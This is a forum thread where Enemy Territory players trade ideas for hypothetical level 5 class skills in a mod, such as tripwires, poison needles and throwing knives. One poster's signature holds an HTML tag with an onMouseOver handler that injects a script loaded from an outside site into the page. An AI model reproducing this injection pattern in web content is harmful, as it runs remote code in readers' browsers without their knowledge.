Level 5?

Discussion for Bani's Pub mod

Moderators: Forum moderators, developers

Radeon9.8kpunk

Level 5?

Post by Radeon9.8kpunk »

I think it would be nice if your skills could go even higher, here a few level 5 skill suggestion.

Level 5 medicine
-Players can shoot revive needles a short distance to revive

Level 5 Battle sense
-If you have higher XP than the disguised enemy, you can see through their disguise

Level 5 CovOps
-If your XP is higher than the enemy looking at you they will see your name pop up as well as your health bar when you are farther away.
the distance would be determined by either how much more xp you have than them or a server variable

Level 5 engineer
- Trip wire (possibly be able to rig to doors?) (costs 1 grenade and takes as long as a mine to deploy and would count as a mine so they couldnt be over used)

Level 5 soldier
- If equiped with a SMG as their primary they are given armor piercing rounds which would do x% more damage (x would be a variable)

Level 5 Field Ops
- Can create mobile spawn points (like banimods COs)

Level 5 small arms
-Given SMG equiped with rate of fire toggle, when in semi mode accuracy dramaticly goes up, 3 shot burst has a slightly better accuracy than fully auto
Bandit is looking for a ET Clan!
I am proficient in combat and medical skills
My accurracy is usually around 35-40%
I usually get at least twice as many kills as deaths
=FF=im2good4u

Post by =FF=im2good4u »

lol i have realy had a big fantasie about this before :lol:

inever realy wanted to post it since every1 would have a different idea about each level

also there a lot anti XP whore on a etpro forum sadly :cry:

my suggestion is

medics 5 abilitie to pick up heavy waepons

BS 5 good idea

Covert Ops 5 1 headshot kill sniper

enginer 5 trap wire would be cool but is kinda shrub .. also i think that if its gonig ot be trap wire make it cost 1 granade and count as a trap wire not as mine. i persoanly prefer arming dynomite on your self and run inot the enemy (not usedable for objectives)

soldier 5 abilitie to select 2 heavy weapons not duel but seperated

fiels ops 5 well i already posted a differnt spawn bani XCO system the parate trooper but for feildops my idea was able to call arty by command map so every where

light weapons 5 not so bad idea but kinda weak / useless
Radeon9.8kpunk

Post by Radeon9.8kpunk »

by the way, i made this thread so that every one could post there level 5 ideas, so if u have some speak up!

I like the idea of one hit kills headshot sniper!
i also agree that using a trap should cost 1 mine and not grenade but, grenades were actaully used in real trip wire
=FF=im2good4u

Post by =FF=im2good4u »

my idea was make i cost 1 granade and count it as trap mine in team_maxtrapmines
Rain

Post by Rain »

ET was originally going to have 5 skill levels, as you can see by poking around the mod sdk. The only level 5 skill I recall is "leadership", level 5 for the field ops. It would make your sprint bar charge 2x as fast if you were within a 32-ish foot radius of a level 5 field ops.

It's possible that this is the only level 5 skill that remains in the code (or perhaps was ever even coded.)
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
bacon

Post by bacon »

My suggestions

Battle Sense:
- You can see enemies who within the line of sight of any teammate on the command map.
- Maybe nightvision binoculars...or maybe not.

Medic:
- The ability to give adrenaline to teammates.
- More nades.

Engineer:
- Tripmines. A good way of doing it is letting each player place only 1 tripmine, and when they die it disappears (like the satchel). They can be blown up by explosives.

Field Ops:
- Leadership (see Rain's post). This will help teamplay (unless the field ops is a n00b) :)
- Seeing through covert ops' disguises without the binoculars.

Covert Ops:
- Reduced heat on the sten.
- Too further the assassin skill: Make them move silently like the spy in banimod.

Soldier:
- Maybe allow them to run faster and jump a bit higher.
CrazyGuy

Post by CrazyGuy »

Bah...bad enough there are Rambo Medics with adrenaline. Now, you want to let the Medic give that adrenaline to there teammates.

:shock:
=FF=im2good4u

Post by =FF=im2good4u »

CrazyGuy wrote:Bah...bad enough there are Rambo Medics with adrenaline. Now, you want to let the Medic give that adrenaline to there teammates.

:shock:
dont forget it stil needs charge

and the night vision gogles that was my first i ea but i forgot sincei t has been a long time since iv though about these levels
hiro

Post by hiro »

I like the idea for the leadership skill helping teammates nearby, that might actually get players working together (shock horror!)

lvl 5 meds could give teammates some degree of health regeneration when near. certainly they shouldn't get anything that makes them physically stronger or reward them with more weaponary, the idea is to discourage rambo behaviour.

soldiers, well they already have it easy in this game and by the time they get to lvl 5 they'd be pretty powerful, so giving them even faster rof or more ammo would be unnecessary. The flack jacket would also make them far too strong.
maybe have the presence of a lvl5 soldier nearby inspire confidience in teammates and let them be the ones to increase the sprint bar charge rate? Even if they are a bad TKing panzer and teammates lose confidence around them, the extra sprint would help them get away! :p

That would leave the lvl 5 field-op to increase teammates' skill charge bar. although this would add a third possible charge speed on top of the command post, I think it could be balanced out to be workable and useful.

Trip-wire mines for engineers cound be fun, they should be defusable by other engys and the tripwire should be seen in translucent form by players with lvl 4 BS as per mines. Detection by coverts and subsequent detonation would be the same as normal mines. Perhaps they should require two mines to be linked together, that would require more skill to lay them and reduce their potential as a spam weapon.

Coverts themselves might benifit from increased power for sniping, however I think a more coverty skill might be more fun, such as retaining a stolen uniform after being spotted. That player could then appear as 'Disguised Enemy' to all enemy for a short time or until he either dies or 'swaps' uniform. The silent walk is also a good one.

Battle Sense is a tricky one, if anything I'd make them work harder for basic skills such as the ablility to sprint! :p Nah to be fair players should get something good for getting this far. Night vision wouldn't be of much use on the existing ET maps. maybe they never lose their helmet after lvl5?

I don't think the smgs need any help with light weapons lvl5, maybe reduced damage drop-off at distance. However far more fun would be the ablility to throw knives! :D
Radeon9.8kpunk

Post by Radeon9.8kpunk »

more of my ideas
level 5 covops
sabotague resources
-Cov ops can turn ammo packs into blank rounds which causes gun to shoot blanks until the player reloads. the blank rounds would make a higher pitched noise.
-Cov ops can sabotage med packs to contain poison which drains life for x seconds and takes y health per second. Poison can be healed by recieving a good medpack
bacon

Post by bacon »

hiro wrote:Trip-wire mines for engineers cound be fun, they should be defusable by other engys and the tripwire should be seen in translucent form by players with lvl 4 BS as per mines. Detection by coverts and subsequent detonation would be the same as normal mines. Perhaps they should require two mines to be linked together, that would require more skill to lay them and reduce their potential as a spam weapon.
You're aware that the wire for tripmines is visible right?
http://image.hostcubix.com/getimg.php?img=tripmine.jpg
hiro

Post by hiro »

I didn't know they had laser tripwires in WWII :shock:
=FF=im2good4u

Post by =FF=im2good4u »

this depens on how etpro team or bayonet team codes :D
Kwyjibo

Post by Kwyjibo »

Here are some of my ideas:

Level 5 Medic: Adreneline Needle Alternate Fire mode is used as a Poision / Lethal Injection needle; this would take about 1/3 of the charge bar when used, you poke the enemy with it (just as you would a teammate with syringe) and the enemys screen gets blurred, blinks/flashes red, screen gets turned slightly sideways, cool stuff like that as if you are poisoned. This happens for about 10 seconds or until your teams medic can poke you with their normal syringe.

Level 5 Field Ops: The ability to call airstrikes by opening up their command maps and selecting the block area (ie: C2) from anywhere.

Level 5 Engineer: The ability to set dynamyte with a 15 second timer, which can also be held at longer clicks to increase this time from 15 to 30, 45, and 60 second timers until explosion.

Level 5 Soldier: The ability to have helmets that can NOT be shot off, as well as the ability to pick up every single weapon in the game including the grenade launchers, m1grande rifles, stens, etc..

Level 5 Covert Ops: Awarded with the ability to throw knives as alt-fire! Also, they can now disguise their sachel charges as medic or ammo packs.

Level 5 Battle Sense: Ability to automatically spot landmines from further away with the 'invisible' like effect over the mine itself as well as the flag above it with the same effect so they are spotted at longer distances.

Level 5 Light Weapons: The ability to now use melee attacks and whack their guns at enemies.

General Rank Award: The ability to swap their weapons regardless of class to pick up and use EVERY weapon at a slightly handicapped ease of use, so a medic general can pick up a panzer but it will be 20% weaker than a soldier carrying it, and if they were to pick up an mg-42, it would have about 20% more recoil when shooting.

Those are my ideas, I tried to keep them reasonable and not too extreme and rediculous and somewhat historically accurate. Please let me know what you think :)
Radeon9.8kpunk

Post by Radeon9.8kpunk »

kwyjibo, those are some great ideas

it would also be cool for covops to have poison smoke nades!